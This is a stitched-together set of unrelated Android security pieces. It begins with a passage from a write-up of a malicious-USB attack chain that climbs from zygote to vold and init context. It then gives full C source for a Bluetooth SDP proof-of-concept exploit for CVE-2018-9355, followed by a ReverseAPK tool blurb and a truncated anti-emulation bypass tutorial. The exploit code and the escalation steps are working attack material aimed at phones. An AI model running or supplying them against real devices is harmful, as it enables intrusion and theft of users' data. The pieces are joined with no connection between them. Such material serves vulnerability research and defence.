A physical attacker can abuse this by attaching a fake storage device that returns different data for multiple reads from the same location. This allows us to present, for example, a romfs header with a long label string to blkid while presenting a perfectly normal vfat filesystem to fsck_msdos and the in-kernel filesystem implementation.


This is relatively simple to implement in practice thanks to Linux’s built-in support for device-side USB. Andrzej Pietrasiewicz’s talk "Make your own USB gadget" is a useful introduction to this topic. Basically, the kernel ships with implementations for device-side USB mass storage, HID devices, ethernet adapters, and more; using a relatively simple pseudo-filesystem-based configuration interface, you can configure a composite gadget that provides one or multiple of these functions, potentially with multiple instances, to the connected device. The hardware you need is a system that runs Linux and supports device-side USB; for testing this attack, a Raspberry Pi Zero W was used.


The f_mass_storage gadget function is designed to use a normal file as backing storage; to be able to interactively respond to requests from the Android phone, a FUSE filesystem is used as backing storage instead, using the direct_io option / the FOPEN_DIRECT_IO flag to ensure that our own kernel doesn’t add unwanted caching.


At this point, it is already possible to implement an attack that can steal, for example, photos stored on external storage. Luckily for an attacker, immediately after a USB stick has been mounted, is launched, which is a process whose SELinux domain permits access to USB devices. So after a malicious FAT partition has been mounted over /data (using the label string ‘UUID=»../../data’), the zygote forks off a child with appropriate SELinux context and group membership to permit accesses to USB devices. This child then loads bytecode from /data/dalvik-cache/, permitting us to take control over, which has the necessary privileges to exfiltrate external storage contents.


However, for an attacker who wants to access not just photos, but things like chat logs or authentication credentials stored on the device, this level of access should normally not be sufficient on its own.

Dealing with SELinux: Triggering the bug twice

The major limiting factor at this point is that, even though it is possible to mount over /data, a lot of the highly-privileged code running on the device is not permitted to access the mounted filesystem. However, one highly-privileged service does have access to it: vold.


vold actually supports two types of USB sticks, PublicVolume and PrivateVolume. Up to this point, this blogpost focused on PublicVolume; from here on, PrivateVolume becomes important.
A PrivateVolume is a USB stick that must be formatted using a GUID Partition Table. It must contain a partition that has type UUID kGptAndroidExpand (193D1EA4-B3CA-11E4-B075-10604B889DCF), which contains a dm-crypt-encrypted ext4 (or f2fs) filesystem. The corresponding key is stored at /data/misc/vold/expand_{partGuid}.key, where {partGuid} is the partition GUID from the GPT table as a normalized lowercase hexstring.


As an attacker, it normally shouldn’t be possible to mount an ext4 filesystem this way because phones aren’t usually set up with any such keys; and even if there is such a key, you’d still have to know what the correct partition GUID is and what the key is. However, we can mount a vfat filesystem over /data/misc and put our own key there, for our own GUID. Then, while the first malicious USB mass storage device is still connected, we can connect a second one that is mounted as PrivateVolume using the keys vold will read from the first USB mass storage device. (Technically, the ordering in the last sentence isn’t entirely correct — actually, the exploit provides both mass storage devices as a single composite device at the same time, but stalls the first read from the second mass storage device to create the desired ordering.)


Because PrivateVolume instances use ext4, we can control DAC ownership and permissions on the filesystem; and thanks to the way a PrivateVolume is integrated into the system, we can even control SELinux labels on that filesystem.


In summary, at this point, we can mount a controlled filesystem over /data, with arbitrary file permissions and arbitrary SELinux contexts. Because we control file permissions and SELinux contexts, we can allow any process to access files on our filesystem — including mapping them with PROT_EXEC.

Injecting into zygote

The zygote process is relatively powerful, even though it is not listed as part of the TCB. By design, it runs with UID 0, can arbitrarily change its UID, and can perform dynamic SELinux transitions into the SELinux contexts of system_server and normal apps. In other words, the zygote has access to almost all user data on the device.


When the 64-bit zygote starts up on system boot, it loads code from /data/dalvik-cache/arm64/system@framework@boot*.{art,oat,vdex}. Normally, the oat file (which contains an ELF library that will be loaded with dlopen()) and the vdex file are symlinks to files on the immutable /system partition; only the art file is actually stored on /data. But we can instead make system@framework@boot.art and system@framework@boot.vdex symlinks to /system (to get around some consistency checks without knowing exactly which Android build is running on the device) while placing our own malicious ELF library at system@framework@boot.oat (with the SELinux context that the legitimate oat file would have). Then, by placing a function with __attribute__((constructor)) in our ELF library, we can get code execution in the zygote as soon as it calls dlopen() on startup.


The missing step at this point is that when the attack is performed, the zygote is already running; and this attack only works while the zygote is starting up.

Crashing the system

This part is a bit unpleasant.


When a critical system component (in particular, the zygote or system_server) crashes (which you can simulate on an eng build using kill), Android attempts to automatically recover from the crash by restarting most userspace processes (including the zygote). When this happens, the screen first shows the boot animation for a bit, followed by the lock screen with the "Unlock for all features and data" prompt that normally only shows up after boot. However, the key material for accessing user data is still present at this point, as you can verify if ADB is on by running "ls /sdcard" on the device.


This means that if we can somehow crash system_server, we can then inject code into the zygote during the following userspace restart and will be able to access user data on the device.


Of course, mounting our own filesystem over /data is very crude and makes all sorts of things fail, but surprisingly, the system doesn’t immediately fall over — while parts of the UI become unusable, most places have some error handling that prevents the system from failing so clearly that a restart happens.
After some experimentation, it turned out that Android’s code for tracking bandwidth usage has a safety check: If the network usage tracking code can’t write to disk and >=2MiB (mPersistThresholdBytes) of network traffic have been observed since the last successful write, a fatal exception is thrown. This means that if we can create some sort of network connection to the device and then send it >=2MiB worth of ping flood, then trigger a stats writeback by either waiting for a periodic writeback or changing the state of a network interface, the device will reboot.


To create a network connection, there are two options:


  • Connect to a wifi network. Before Android 9, even when the device is locked, it is normally possible to connect to a new wifi network by dragging down from the top of the screen, tapping the drop-down below the wifi symbol, then tapping on the name of an open wifi network. (This doesn’t work for networks protected with WPA, but of course an attacker can make their own wifi network an open one.) Many devices will also just autoconnect to networks with certain names.
  • Connect to an ethernet network. Android supports USB ethernet adapters and will automatically connect to ethernet networks.


For testing the exploit, a manually-created connection to a wifi network was used; for a more reliable and user-friendly exploit, you’d probably want to use an ethernet connection.


At this point, we can run arbitrary native code in zygote context and access user data; but we can’t yet read out the raw disk encryption key, directly access the underlying block device, or take a RAM dump (although at this point, half the data that would’ve been in a RAM dump is probably gone anyway thanks to the system crash). If we want to be able to do those things, we’ll have to escalate our privileges a bit more.

From zygote to vold

Even though the zygote is not supposed to be part of the TCB, it has access to the CAP_SYS_ADMIN capability in the initial user namespace, and the SELinux policy permits the use of this capability. The zygote uses this capability for the mount() syscall and for installing a seccomp filter without setting the NO_NEW_PRIVS flag. There are multiple ways to abuse CAP_SYS_ADMIN; in particular, on the Pixel 2, the following ways seem viable:


  • You can install a seccomp filter without NO_NEW_PRIVS, then perform an execve() with a privilege transition (SELinux exec transition, setuid/setgid execution, or execution with permitted file capability set). The seccomp filter can then force specific syscalls to fail with error number 0 — which e.g. in the case of open() means that the process will believe that the syscall succeeded and allocated file descriptor 0. This attack works here, but is a bit messy.
  • You can instruct the kernel to use a file you control as high-priority swap device, then create memory pressure. Once the kernel writes stack or heap pages from a sufficiently privileged process into the swap file, you can edit the swapped-out memory, then let the process load it back. Downsides of this technique are that it is very unpredictable, it involves memory pressure (which could potentially cause the system to kill processes you want to keep, and probably destroys many forensic artifacts in RAM), and requires some way to figure out which swapped-out pages belong to which process and are used for what. This requires the kernel to support swap.
  • You can use pivot_root() to replace the root directory of either the current mount namespace or a newly created mount namespace, bypassing the SELinux checks that would have been performed for mount(). Doing it for a new mount namespace is useful if you only want to affect a child process that elevates its privileges afterwards. This doesn’t work if the root filesystem is a rootfs filesystem. This is the technique used here.


In recent Android versions, the mechanism used to create dumps of crashing processes has changed: Instead of asking a privileged daemon to create a dump, processes execute one of the helpers /system/bin/crash_dump64 and /system/bin/crash_dump32, which have the SELinux label u:object_r:crash_dump_exec:s0. Currently, when a file with such a label is executed by any SELinux domain, an automatic domain transition to the crash_dump domain is triggered (which automatically implies setting the AT_SECURE flag in the auxiliary vector, instructing the linker of the new process to be careful with environment variables like LD_PRELOAD):


domain_auto_trans(domain, crash_dump_exec, crash_dump);


At the time this bug was reported, the crash_dump domain had the following SELinux policy:


allow crash_dump {
  domain
  -init
  -crash_dump
  -ueventd
  -watchdogd
}:process { ptrace signal sigchld sigstop sigkill };
r_dir_file(crash_dump, domain)


This policy permitted crash_dump to attach to processes in almost any domain via ptrace() (providing the ability to take over the process if the DAC controls permit it) and allowed it to read properties of any process in procfs. The exclusion list for ptrace access lists a few TCB processes; but notably, vold was not on the list. Therefore, if we can execute crash_dump64 and somehow inject code into it, we can then take over vold.


Note that the ability to actually ptrace() a process is still gated by the normal Linux DAC checks, and crash_dump can’t use CAP_SYS_PTRACE or CAP_SETUID. If a normal app managed to inject code into crash_dump64, it still wouldn’t be able to leverage that to attack system components because of the UID mismatch.


If you’ve been reading carefully, you might now wonder whether we could just place our own binary with context u:object_r:crash_dump_exec:s0 on our fake /data filesystem, and then execute that to gain code execution in the crash_dump domain. This doesn’t work because vold — very sensibly — hardcodes the MS_NOSUID flag when mounting USB storage devices, which not only degrades the execution of classic setuid/setgid binaries, but also degrades the execution of files with file capabilities and executions that would normally involve automatic SELinux domain transitions (unless the SELinux policy explicitly opts out of this behavior by granting PROCESS2__NOSUID_TRANSITION).


To inject code into crash_dump64, we can create a new mount namespace with unshare() (using our CAP_SYS_ADMIN capability), then call pivot_root() to point the root directory of our process into a directory we fully control, and then execute crash_dump64. Then the kernel parses the ELF headers of crash_dump64, reads the path to the linker (/system/bin/linker64), loads the linker into memory from that path (relative to the process root, so we can supply our own linker here), and executes it.


At this point, we can execute arbitrary code in crash_dump context and escalate into vold from there, compromising the TCB. From here on, Android’s security policy considers us to have kernel-equivalent privileges; however, to show what you’d have to do from here to gain code execution in the kernel, this blogpost goes a bit further.

From vold to init context

It doesn’t look like there is an easy way to get from vold into the real init process; however, there is a way into the init SELinux context. Looking through the SELinux policy for allowed transitions into init context, we find the following policy:


domain_auto_trans(kernel, init_exec, init)


This means that if we can get code running in kernel context to execute a file we control labeled init_exec, on a filesystem that wasn’t mounted with MS_NOSUID, then our file will be executed in init context.


The only code that is running in kernel context is the kernel, so we have to get the kernel to execute the file for us. Linux has a mechanism called «usermode helpers» that can do this: Under some circumstances, the kernel will delegate actions (such as creating coredumps, loading key material into the kernel, performing DNS lookups, …) to userspace code. In particular, when a nonexistent key is looked up (e.g. via request_key()), /sbin/request-key (hardcoded, can only be changed to a different static path at kernel build time with CONFIG_STATIC_USERMODEHELPER_PATH) will be invoked.


Being in vold, we can simply mount our own ext4 filesystem over /sbin without MS_NOSUID, then call request_key(), and the kernel invokes our request-key in init context.


The exploit stops at this point; however, the following section describes how you could build on it to gain code execution in the kernel.

From init context to the kernel

From init context, it is possible to transition into modprobe or vendor_modprobe context by executing an appropriately labeled file after explicitly requesting a domain transition (note that this is domain_trans(), which permits a transition on exec, not domain_auto_trans(), which automatically performs a transition on exec):


domain_trans(init, { rootfs toolbox_exec }, modprobe)
domain_trans(init, vendor_toolbox_exec, vendor_modprobe)


modprobe and vendor_modprobe have the ability to load kernel modules from appropriately labeled files:


allow modprobe self:capability sys_module;
allow modprobe { system_file }:system module_load;
allow vendor_modprobe self:capability sys_module;
allow vendor_modprobe { vendor_file }:system module_load;


Android nowadays doesn’t require signatures for kernel modules:


walleye:/ # zcat /proc/config.gz | grep MODULE
# CONFIG_MODULE_SIG is not set


Therefore, you could execute an appropriately labeled file to execute code in modprobe context, then load an appropriately labeled malicious kernel module from there.

Lessons learned

Notably, this attack crosses two weakly-enforced security boundaries: the boundary from blkid_untrusted to vold (when vold uses the UUID provided by blkid_untrusted in a pathname without checking that it resembles a valid UUID) and the boundary from the zygote to the TCB (by abusing the zygote’s CAP_SYS_ADMIN capability). Software vendors have, very rightly, been stressing for quite some time that it is important for security researchers to be aware of what is, and what isn’t, a security boundary; but it is also important for vendors to decide where they want to have security boundaries and then rigorously enforce those boundaries. Unenforced security boundaries can be of limited use (for example, as a development aid while stronger isolation is in development), but they can also have negative effects by obfuscating how important a component is for the security of the overall system.

In this case, the weakly-enforced security boundary between vold and blkid_untrusted actually contributed to the vulnerability, rather than mitigating it. If the blkid code had run in the vold process, it would not have been necessary to serialize its output, and the injection of a fake UUID would not have worked.

PoC for Android Bluetooth bug CVE-2018-9355

CVE-2018-9355 A-74016921 RCE Critical 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, 8.1
/*
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 */

/* PoC for CVE-2018-9355 */

#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdbool.h>
#include <stdint.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <pthread.h>

#include <bluetooth/bluetooth.h>
#include <bluetooth/sdp.h>
#include <bluetooth/l2cap.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>

#define EIR_FLAGS                   0x01  /* flags */
#define EIR_NAME_COMPLETE           0x09  /* complete local name */
#define EIR_LIM_DISC                0x01 /* LE Limited Discoverable Mode */
#define EIR_GEN_DISC                0x02 /* LE General Discoverable Mode */

#define UINT_DESC_TYPE 1
#define DATA_ELE_SEQ_DESC_TYPE 6 /* SDP data element sequence (sdpdefs.h) */

#define SIZE_TWO_BYTES 1
#define SIZE_ONE_BYTE 0
#define SIZE_IN_NEXT_WORD 6 /* length follows in the next 2 bytes */
#define UUID_DESC_TYPE 3
#define ATTR_ID_SERVICE_ID 0x0003

static int count = 0;
static int do_continuation;

static int init_server(uint16_t mtu)
{
	struct l2cap_options opts;
	struct sockaddr_l2 l2addr;
	socklen_t optlen;
	int l2cap_sock;

	/* Create L2CAP socket */
	l2cap_sock = socket(AF_BLUETOOTH, SOCK_SEQPACKET, BTPROTO_L2CAP);
	if (l2cap_sock < 0) {
		printf("opening L2CAP socket: %s", strerror(errno));
		return -1;
	}

	memset(&l2addr, 0, sizeof(l2addr));
	l2addr.l2_family = AF_BLUETOOTH;
	bacpy(&l2addr.l2_bdaddr, BDADDR_ANY);
	l2addr.l2_psm = htobs(SDP_PSM);

	if (bind(l2cap_sock, (struct sockaddr *) &l2addr, sizeof(l2addr)) < 0) {
		printf("binding L2CAP socket: %s", strerror(errno));
		return -1;
	}

	int opt = L2CAP_LM_MASTER;
	if (setsockopt(l2cap_sock, SOL_L2CAP, L2CAP_LM, &opt, sizeof(opt)) < 0) {
		printf("setsockopt: %s", strerror(errno));
		return -1;
	}

	memset(&opts, 0, sizeof(opts));
	optlen = sizeof(opts);

	if (getsockopt(l2cap_sock, SOL_L2CAP, L2CAP_OPTIONS, &opts, &optlen) < 0) {
		printf("getsockopt: %s", strerror(errno));
		return -1;
	}

	opts.omtu = mtu;
	opts.imtu = mtu;

	if (setsockopt(l2cap_sock, SOL_L2CAP, L2CAP_OPTIONS, &opts, sizeof(opts)) < 0) {
		printf("setsockopt: %s", strerror(errno));
		return -1;
	}

	if (listen(l2cap_sock, 5) < 0) {
		printf("listen: %s", strerror(errno));
		return -1;
	}

	return l2cap_sock;
}

static int process_service_search_req(uint8_t *pkt)
{
	uint8_t *start = pkt;
	uint8_t *lenloc = pkt;

	/* Total Handles */
	bt_put_be16(400, pkt); pkt += 2;
	bt_put_be16(400, pkt); pkt += 2;

	/* and that's it! */
	/* TODO: Can we do some heap grooming to make sure we don't get a continuation? */

	//bt_put_be16((pkt - start) - 2, lenloc);
	(void) lenloc;
	return pkt - start;
}

static uint8_t *place_uid(uint8_t *pkt, int o)
{
	int i;

	for (i = 0; i < 16; i++)
		*pkt++ = 0x16 + (i + o);
	return pkt;
}


static size_t flood_u128s(uint8_t *pkt)
{
	int i;
	uint8_t *start = pkt;
	uint8_t *lenloc = pkt;
	size_t retsize = 0;

	bt_put_be16(9, pkt); pkt += 2;

	if (do_continuation == 1) {
		*pkt = DATA_ELE_SEQ_DESC_TYPE << 3;
		*pkt |= SIZE_IN_NEXT_WORD;
		pkt++;
		start = pkt;
		pkt += 2;
	}

	for (i = 0; i < 31; i++) {
		*pkt = (UINT_DESC_TYPE << 3) | SIZE_TWO_BYTES;
		pkt++;
		/* Attr ID */
		bt_put_be16(ATTR_ID_SERVICE_ID, pkt); pkt += 2;

		pkt = place_uid(pkt, i);
	}

	/* Set the continuation */
	if (do_continuation) {
		bt_put_be16(654, lenloc);
		bt_put_be16(651 * 2, start);
		*pkt = 1;
		retsize = 658;
	} else {
		bt_put_be16(651, lenloc);
		//bt_put_be16(648, start);
		*pkt = 0;
		retsize = 654;
	}
	//	bt_put_be16((pkt - lenloc) + 10, lenloc);
	//	bt_put_be16((pkt - start) + 10, start);

	printf("%s: size is pkt - lenloc %zu and pkt is 0x%02x\n", __func__,
	       (size_t) (pkt - lenloc), *pkt);

	return retsize;
}


static size_t do_fake_svcsar(uint8_t *pkt)
{
	uint8_t *start = pkt;

	/* Id and length -- ignored in the code */
	//bt_put_be16(0, pkt);pkt += 2;
	//bt_put_be16(0xABCD, pkt);pkt += 2;

	/* list byte count */
	bt_put_be16(9, pkt); pkt += 2;

	*pkt = DATA_ELE_SEQ_DESC_TYPE << 3;
	pkt++;

	*pkt = (UINT_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	pkt++;
	/* Attr ID */
	bt_put_be16(0x0100, pkt); pkt += 2;

	/* Set the continuation */
	if (do_continuation)
		*pkt = 1;
	else
		*pkt = 0;
	pkt++;

	/* Place the size... */
	//bt_put_be16((pkt - start) - 2, lenloc);

	printf("%zu\n", (size_t) (pkt - start));
	return (size_t) (pkt - start);
}

static void process_request(uint8_t *buf, int fd)
{
	sdp_pdu_hdr_t *reqhdr = (sdp_pdu_hdr_t *) buf;
	sdp_pdu_hdr_t *rsphdr;
	uint8_t *rsp = malloc(65535);
	int send_size = 0;

	memset(rsp, 0, 65535);
	rsphdr = (sdp_pdu_hdr_t *) rsp;
	rsphdr->tid = reqhdr->tid;

	switch (reqhdr->pdu_id) {
	case SDP_SVC_SEARCH_REQ:
		printf("Got a svc srch req\n");
		send_size = process_service_search_req(rsp + sizeof(sdp_pdu_hdr_t));
		rsphdr->pdu_id = SDP_SVC_SEARCH_RSP;
		rsphdr->plen = htons(send_size);
		break;
	case SDP_SVC_ATTR_REQ:
		printf("Got a svc attr req\n");
		//status = service_attr_req(req, &rsp);
		rsphdr->pdu_id = SDP_SVC_ATTR_RSP;
		break;
	case SDP_SVC_SEARCH_ATTR_REQ:
		printf("Got a svc srch attr req\n");
		//status = service_search_attr_req(req, &rsp);
		rsphdr->pdu_id = SDP_SVC_SEARCH_ATTR_RSP;
		send_size = flood_u128s(rsp + sizeof(sdp_pdu_hdr_t));
		//do_fake_svcsar(rsp + sizeof(sdp_pdu_hdr_t)) + 3;
		rsphdr->plen = htons(send_size);
		break;
	default:
		printf("Unknown PDU ID : 0x%x received", reqhdr->pdu_id);
	}

	printf("%s: sending %zu\n", __func__, send_size + sizeof(sdp_pdu_hdr_t));
	send(fd, rsp, send_size + sizeof(sdp_pdu_hdr_t), 0);
	free(rsp);
}

static void *l2cap_data_thread(void *input)
{
	int fd = *(int *)input;
	sdp_pdu_hdr_t hdr;
	uint8_t *buf;
	int len, size;

	while (true) {
		len = recv(fd, &hdr, sizeof(sdp_pdu_hdr_t), MSG_PEEK);
		if (len < 0 || (unsigned int) len < sizeof(sdp_pdu_hdr_t))
			break;

		size = sizeof(sdp_pdu_hdr_t) + ntohs(hdr.plen);
		buf = malloc(size);
		if (!buf)
			break;

		printf("%s: trying to recv %d\n", __func__, size);
		len = recv(fd, buf, size, 0);
		if (len <= 0) {
			free(buf);
			break;
		}

		if (!count) {
			process_request(buf, fd);
			count++;
		} else if (count >= 1) {
			do_continuation = 0;
			process_request(buf, fd);
		}
		free(buf);
	}

	return NULL;
}

/* derived from hciconfig.c */
static void *advertiser(void *unused)
{
	uint8_t status;
	int device_id, handle;
	struct hci_request req = { 0 };
	le_set_advertise_enable_cp acp = { 0 };
	le_set_advertising_parameters_cp avc = { 0 };
	le_set_advertising_data_cp data = { 0 };

	(void) unused;

	device_id = hci_get_route(NULL);
	if (device_id < 0) {
		printf("%s: Failed to get route: %s\n", __func__, strerror(errno));
		return NULL;
	}

	handle = hci_open_dev(device_id);
	if (handle < 0) {
		printf("%s: Failed to open and acquire handle: %s\n", __func__, strerror(errno));
		return NULL;
	}

	/* Set advertising parameters */
	avc.min_interval = avc.max_interval = htobs(150);
	avc.chan_map = 7;
	req.ogf = OGF_LE_CTL;
	req.ocf = OCF_LE_SET_ADVERTISING_PARAMETERS;
	req.cparam = &avc;
	req.clen = LE_SET_ADVERTISING_PARAMETERS_CP_SIZE;
	req.rparam = &status;
	req.rlen = 1;

	if (hci_send_req(handle, &req, 1000) < 0) {
		printf("%s: Failed to send request %s\n", __func__, strerror(errno));
		return NULL;
	}

	/* Enable advertising */
	acp.enable = 0x01;
	memset(&req, 0, sizeof(req));
	req.ogf = OGF_LE_CTL;
	req.ocf = OCF_LE_SET_ADVERTISE_ENABLE;
	req.cparam = &acp;
	req.clen = LE_SET_ADVERTISE_ENABLE_CP_SIZE;
	req.rparam = &status;
	req.rlen = 1;

	if (hci_send_req(handle, &req, 1000) < 0) {
		printf("%s: Failed to send request %s\n", __func__, strerror(errno));
		return NULL;
	}

	/* Advertise under the name "DLEAK" */
	data.data[0] = htobs(2);
	data.data[1] = htobs(EIR_FLAGS);
	data.data[2] = htobs(EIR_GEN_DISC | EIR_LIM_DISC);
	data.data[3] = htobs(6);
	data.data[4] = htobs(EIR_NAME_COMPLETE);
	data.data[5] = 'D';
	data.data[6] = 'L';
	data.data[7] = 'E';
	data.data[8] = 'A';
	data.data[9] = 'K';
	data.length = 10;

	memset(&req, 0, sizeof(req));
	req.ogf = OGF_LE_CTL;
	req.ocf = OCF_LE_SET_ADVERTISING_DATA;
	req.cparam = &data;
	req.clen = LE_SET_ADVERTISING_DATA_CP_SIZE;
	req.rparam = &status;
	req.rlen = 1;

	if (hci_send_req(handle, &req, 1000) < 0) {
		printf("%s: Failed to send request %s\n", __func__, strerror(errno));
		return NULL;
	}

	printf("Device should be advertising under DLEAK\n");
	return NULL;
}

int main(int argc, char **argv)
{
	pthread_t *io_channel;
	pthread_t adv;
	int       fds[16];
	const int io_chans = 16;
	struct sockaddr_l2 addr;
	socklen_t len = sizeof(addr);
	int l2cap_sock;
	int i, j;

	(void) argc;
	(void) argv;

	pthread_create(&adv, NULL, advertiser, NULL);

	l2cap_sock = init_server(652);
	if (l2cap_sock < 0)
		return EXIT_FAILURE;

	io_channel = malloc(io_chans * sizeof(*io_channel));
	if (!io_channel)
		return EXIT_FAILURE;

	do_continuation = 1;
	for (i = 0; i < io_chans; i++) {
		printf("%s: Going to accept on io chan %d\n", __func__, i);
		fds[i] = accept(l2cap_sock, (struct sockaddr *) &addr, &len);
		if (fds[i] < 0) {
			printf("%s: Accept failed with %s\n", __func__, strerror(errno));
			break;
		}
		printf("%s: accepted\n", __func__);
		pthread_create(&io_channel[i], NULL, l2cap_data_thread, &fds[i]);
	}

	for (j = 0; j < i; j++)
		pthread_join(io_channel[j], NULL);

	return EXIT_SUCCESS;
}

ReverseAPK — Quickly Analyze And Reverse Engineer Android Packages

Quickly analyze and reverse engineer Android applications.


  • Displays all extracted files for easy reference
  • Automatically decompile APK files to Java and Smali format
  • Analyze AndroidManifest.xml for common vulnerabilities and behavior
  • Static source code analysis for common vulnerabilities and behavior
    • Device info
    • Intents
    • Command execution
    • SQLite references
    • Logging references
    • Content providers
    • Broadcast receivers
    • Service references
    • File references
    • Crypto references
    • Hardcoded secrets
    • URLs
    • Network connections
    • SSL references
    • WebView references




reverse-apk <apk_name>


Bypassing Android Anti-Emulation


This is the first of a series of posts where we will focus on solving Android reversing challenges. The challenge is focused on a binary protection called «anti-emulation» (you can find more info in the OWASP Top Ten 2014/2016 article). In the upcoming entries we will talk about other protections like root checkers, certificate pinning, anti-tampering and obfuscation techniques, along with ways to protect our app from different tools (Xposed, Frida, etc.).

The download link for the apk is and the sha1 signature is:
a2d88143cc3de73387931f84439a4c5e4fdfe123 ReverzeMe1.apk

Before the analysis of the challenge itself, I will introduce the concept of «anti-emulation» on Android. A good reference for this topic is the Mobile Security Testing Guide by OWASP. It shows some examples of these techniques and different ways to analyze them. There is also an API called SafetyNet, an Android API that creates a profile of the device using software and hardware information, which is useful for checking different Android protections.

If we look inside the Emulator Detection Examples section, we see that an application has several ways to detect the emulation process.

For example, by checking different fields like «Build», «TelephonyManager», «android.os.SystemProperties», «ro.product.device», «ro.kernel.qemu», etc., it can infer from the responses whether it is running on a physical device or in an Android emulator. To check if the app has this implementation in place, we can try to obtain its code. This can be done through different techniques, using tools such as apktool, jadx, cfr, etc.

We will see how we can make use of some of those tools to obtain a really good approximation of the application code. For example, using apktool we can decode resources to nearly original form, and we can even rebuild them after making some modifications. With «jadx» or «cfr» (both Java decompilers) we can analyze the «java code» obtained after the decompilation process. This practice allows us to look at the code in a more natural way, since the output from the Java decompilers consists of «.java» files, whereas the output from apktool consists of «.smali» code files.

I will not get into Java decompilers in this post, because that is out of scope; we will simply use them to analyze the code for the application in the challenge. Then, we will modify the application from the .smali code. We will show how to use apktool to obtain a good approximation of the code, to be able to modify it as we need to and then rebuild it.
With this in mind, we will take a look at the process used to create an APK file, since it will be useful when we start trying to solve the challenge.

The process of creating an APK file:

  1. First, the developer creates the application in .java files, which are then compiled into .class files.
  2. Once these .class files are created, they are converted into .dex (Dalvik EXecutable) files. These files contain byte code for the Dalvik Virtual Machine (DVM), a non-standard JVM that runs on Android devices.
  3. The DVM runs the DEX files while ART runs OAT (ELF) files.
  4. Some other XML files are converted to a binary format optimized for space.
  5. The last step is the APK creation: the .dex files, binary XML files and other resources needed to run the application are packaged into an Android Package file (.apk).
  6. After the APK file is signed by the developer (we’ll come back to this in the «Manual patching with apktool» section), the APK is ready to be installed.
  7. If we want to look at the APK file, we can check its content by unpacking it, for example: $unzip -e example.apk -d example_folder

In short, the APK file is just a signed zip file, and we can unzip it using the unzip command:

$unzip ReverseMe1.apk -d reverseme_unzipped

If we take a look at the manifest, we notice that the resources are encoded; we can use apktool to decode them later.

$more AndroidManifest.xml

Anti-Emulation Checks:

As we mentioned earlier, there are several checks that an application can perform in order to detect whether it is running in an emulated environment or on an actual device. Usually malware APKs have this kind of protection to avoid any analysis. Some common validations are listed here (anti-emulation process), along with some examples.

Below are some code examples of different validations that I have encountered on applications while writing this post:

Some validation methods are even called “isEmulator()”, “carrierNameFromTelephonyManager()”, or my personal favorite so far, “smellsLikeAnEmulator()”. All of them look for the same, or similar, validations: they test with “equals”, “contains”, “startsWith” or “endsWith” against some hardcoded strings that can be interpreted as being set by an emulator. But they all look pretty much the same.

I asked myself why this happens. I googled it and, of course, the answer was right there: the first result was a stackoverflow response.

I started looking into some other apps, and I found many more quite similar implementations:

The difference with the previous set of validation methods is that, while the first set validates through “string comparisons”, the second one looks at the “Android system properties” to try to detect emulated environments.

Then, by simply analyzing the implementation methods, we can identify two main approaches to implement an anti-emulation protection. We can use this link.

Strings comparisons:

Let’s take a look at the “isEmulator()” example and its validations:

I wrote this reference table:

We can check them in an easy way using the following command on our computers with adb:

╰─$ adb shell getprop ro.build.fingerprint
generic/vbox86p/vbox86p:5.1/LMY47D/genymotion08250738:userdebug/test-keys

Basically we can use $adb shell getprop < key > to check the different values.

Android System Properties validations:

Now that we know how to check for validation through strings, we can do the same with the Android System Properties validations.

Android has a set of properties about the device that can be read using the getprop command-line utility, as we just saw. Those system properties are stored in key-value pair format in the property files (default.prop, local.prop, etc.), and we will read those to check the anti-emulation process.

If we want to understand more about the property files, we can check the property output using “adb shell cat default.prop”:

$adb shell cat default.prop


But if we returned to the previous image:

They are checking ro.hardware, ro.kernel.qemu, ro.serialno, ro.product.name, ro.product.model, etc. We can check this output too using:

╰─$ adb shell getprop
╰─$ adb shell getprop ro.product.device
╰─$ adb shell getprop ro.product.model
Custom Phone - 5.1.0 - API 22 - 768x1280
╰─$ adb shell getprop ro.kernel.qemu
╰─$ adb shell getprop ro.hardware
╰─$ adb shell getprop qemu.hw.mainkeys
╰─$ adb shell getprop ro.bootloader
╰─$ adb shell getprop ro.bootmode
╰─$ adb shell getprop
╰─$ adb shell getprop
╰─$ adb shell getprop

And again, if the value of is 1, the app is running on an emulator. The same goes for ro.kernel.qemu and the others.

Now it is easy to understand which part of the code we need to modify to bypass the anti-emulation checks. We need to patch all such validations inside the code to bypass the application.

Challenge resolution:

Jadx challenge interpretation:

If we install the application inside the emulator and run it, we will see something similar to the screenshot below. If we write some alphanumeric input, a warning stating «This Devices is not supported» will appear. Since we don’t know why this happens, we can use jadx to obtain the .java code and use it as a starting point to determine the reason.

Of course, we can also use apktool or unzip the APK file to know more about the application, and maybe obtain some other kind of information. In this approach, we will focus on the .java code and try to understand the application workflow.

To decompile the APK, using jadx is enough for this challenge, although there are lots of Java decompilers out there that we could also use.

$jadx ReverzeMe1.apk

We can see some errors and warnings in the images above, but for the purpose of this post they’re not important. Once the decompilation process has finished, the tool should have created a folder with all the decompiled files, which look like this:

If we look for the text of the warning we saw earlier, we’ll find a «toast», which is a view containing a quick little message for the user (the Toast class helps you create and manage them). We can also note that the message is shown depending on the value returned by «ChallengeJNI.this.checkIfDeviceIsEmulator().booleanValue()».

What do you think about this line?? :).

Let’s take a look at the implementation of the «checkIfDeviceIsEmulator()» function:

Basically, what it does is check some strings against a set of predefined strings, like we saw in the “Anti-Emulation Checks” section before. Now we will try to bypass them.


Apktool challenge interpretation:

Like we already saw, we need to modify the checkIfDeviceIsEmulator() function in order to bypass the application’s validation, so now we are going to use apktool to do that.

Apktool patching and reverse engineering:

After we have installed apktool, we can check the tool’s options. For now we will focus on the decode (‘d’) and build (‘b’) options. Apktool needs an input .apk, which in this case is the one from the challenge we are trying to solve.


To decode the application execute the following command:

$apktool d ReverseMe1.apk -o reverseme_apktool
$ls -la
$cd reverseme_apktool
$ls -la 

